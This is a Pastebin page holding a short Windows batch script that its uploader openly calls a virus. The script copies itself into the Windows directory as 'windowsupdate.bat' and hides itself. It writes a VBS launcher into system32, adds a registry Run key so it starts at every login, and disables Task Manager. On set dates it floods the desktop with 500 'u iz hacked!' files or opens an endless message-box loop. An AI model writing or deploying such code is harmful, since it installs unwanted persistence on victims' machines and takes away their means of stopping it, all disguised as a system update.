Advertisement
Guest User

bitch wirus

a guest
Mar 26th, 2017
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 1.05 KB | None | 0 0
  1. @echo off
  2. set virrun=%WinDir%\system32\upd.vbs
  3.  
  4. if not exist "%virrun%" (
  5. echo CreateObject^("Wscript.Shell"^).Run "%windir%\windowsupdate.bat",0,True
  6. )>%virrun%
  7.  
  8. if not exist "%WinDir%\windowsupdate.bat" (
  9. attrib "%~f0" -h
  10. copy "%~f0" %WinDir%\windowsupdate.bat
  11. %WinDir%\windowsupdate.bat
  12. del "%~f0"
  13. )
  14.  
  15. attrib "%~f0" +h
  16.  
  17. setlocal EnableDelayedExpansion
  18. set desktop=%userprofile%\desktop
  19.  
  20. REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /t REG_SZ /v update /d %WinDir%\system32\upd.vbs /f
  21. REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  22. if "%date:~4,2%"=="04" (
  23. if "%date:~7,2%"=="01" (
  24. for /l %%i in (1,1,500) do (
  25. echo @echo off > "%desktop%\xXVIRUSXx%%i.bat"
  26. echo echo u iz hacked! >> "%desktop%\xXVIRUSXx%%i.bat"
  27. echo pause ^>nul >> "%desktop%\xXVIRUSXx%%i.bat"
  28. )
  29. )
  30. )
  31.  
  32. if "%date:~4,2%"=="10" (
  33. if "%date:~7,2%"=="01" (
  34.  
  35. (
  36. echo do
  37. echo MsgBox "Today is danooct1s birthday. respect it."
  38. echo loop
  39. )>"%TMP%\dan.vbs"
  40. "%TMP%\dan.vbs"
  41. del "%TMP%\dan.vbs
  42. )
  43. )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement